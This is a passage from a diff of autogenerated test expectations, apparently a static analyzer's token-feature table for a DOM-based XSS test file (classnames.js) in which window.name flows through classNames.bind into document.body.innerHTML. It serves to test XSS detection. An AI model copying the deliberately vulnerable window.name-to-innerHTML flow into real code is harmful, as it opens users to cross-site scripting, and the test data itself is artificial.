() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:64 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:64 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:64 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:69 | window.name | CalleeFlexibleAccessPath | classNamesB | | autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:69 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:69 | window.name | calleeImports | classnames/bind | @@ -12173,12 +92354,57 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:69 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:69 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:69 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:66:9:69 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:66:9:69 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:66:9:69 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:66:9:69 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:66:9:69 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:9:72:9:84 | ">Hello | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:9:72:9:84 | ">Hello | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:9:72:9:84 | ">Hello | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:9:72:9:84 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:9:72:9:84 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:9:72:9:84 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:19 | unsafeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:19 | unsafeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeS ... .name}) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeS ... .name}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeS ... .name}) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeS ... .name}) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeS ... .name}) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeStyle | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeStyle | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeStyle | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:9:10:57 | unsafeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:32 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:32 | classNames | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:32 | classNames | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:32 | classNames | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:32 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:37 | classNames.bind | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:37 | classNames.bind | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:37 | classNames.bind | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:37 | classNames.bind | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:37 | classNames.bind | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | classNa ... .name}) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | classNa ... .name}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | classNa ... .name}) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | classNa ... .name}) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | classNa ... .name}) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | exceptional return of classNa ... .name}) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | exceptional return of classNa ... .name}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | exceptional return of classNa ... .name}) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | exceptional return of classNa ... .name}) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:23:10:57 | exceptional return of classNa ... .name}) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:34:10:37 | bind | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:34:10:37 | bind | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:34:10:37 | bind | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:34:10:37 | bind | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:34:10:37 | bind | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:10:39:10:56 | {foo: window.name} | CalleeFlexibleAccessPath | classNames.bind | | autogenerated/Xss/DomBasedXss/classnames.js:10:39:10:56 | {foo: window.name} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:10:39:10:56 | {foo: window.name} | calleeImports | classnames | @@ -12188,6 +92414,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:10:39:10:56 | {foo: window.name} | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:10:39:10:56 | {foo: window.name} | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:10:39:10:56 | {foo: window.name} | receiverName | classNames | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:42 | foo | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:42 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:42 | foo | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:42 | foo | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:42 | foo | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:40:10:55 | foo: window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:50 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:50 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:50 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:50 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:50 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:55 | window.name | CalleeFlexibleAccessPath | classNames.bind | | autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:55 | window.name | InputAccessPathFromCallee | 0.foo | | autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:55 | window.name | InputArgumentIndex | 0 | @@ -12198,6 +92444,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:55 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:55 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:10:45:10:55 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:10:52:10:55 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:10:52:10:55 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:10:52:10:55 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:10:52:10:55 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:10:52:10:55 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:12 | document | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:12 | document | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:79 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:79 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:79 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:79 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:5:11:79 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:14:11:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:14:11:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:14:11:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:14:11:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:14:11:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:19:11:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:19:11:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:19:11:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:19:11:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:19:11:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:11:31:11:79 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:11:31:11:79 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:11:31:11:79 | `` | contextSurroundingFunctionParameters | () | @@ -12210,6 +92491,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:11:32:11:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:57 | unsafeStyle | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:57 | unsafeStyle | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:57 | unsafeStyle | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:57 | unsafeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:57 | unsafeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | exceptional return of unsafeStyle('foo') | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | exceptional return of unsafeStyle('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | exceptional return of unsafeStyle('foo') | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | exceptional return of unsafeStyle('foo') | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | exceptional return of unsafeStyle('foo') | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | unsafeStyle('foo') | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | unsafeStyle('foo') | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:11:47:11:64 | unsafeStyle('foo') | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | @@ -12230,6 +92521,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:11:66:11:78 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:11:66:11:78 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:11:66:11:78 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:17 | safeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:17 | safeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeSty ... ind({}) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeSty ... ind({}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeSty ... ind({}) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeSty ... ind({}) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeSty ... ind({}) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeStyle | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeStyle | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeStyle | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:9:12:39 | safeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:30 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:30 | classNames | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:30 | classNames | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:30 | classNames | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:30 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:35 | classNames.bind | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:35 | classNames.bind | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:35 | classNames.bind | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:35 | classNames.bind | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:35 | classNames.bind | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | classNames.bind({}) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | classNames.bind({}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | classNames.bind({}) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | classNames.bind({}) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | classNames.bind({}) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | exceptional return of classNames.bind({}) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | exceptional return of classNames.bind({}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | exceptional return of classNames.bind({}) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | exceptional return of classNames.bind({}) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:21:12:39 | exceptional return of classNames.bind({}) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:12:32:12:35 | bind | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:12:32:12:35 | bind | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:12:32:12:35 | bind | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:12:32:12:35 | bind | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:12:32:12:35 | bind | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:12:37:12:38 | {} | CalleeFlexibleAccessPath | classNames.bind | | autogenerated/Xss/DomBasedXss/classnames.js:12:37:12:38 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:12:37:12:38 | {} | calleeImports | classnames | @@ -12239,6 +92570,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:12:37:12:38 | {} | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:12:37:12:38 | {} | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:12:37:12:38 | {} | receiverName | classNames | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:12 | document | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:12 | document | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:12 | document | fileImports | classnames 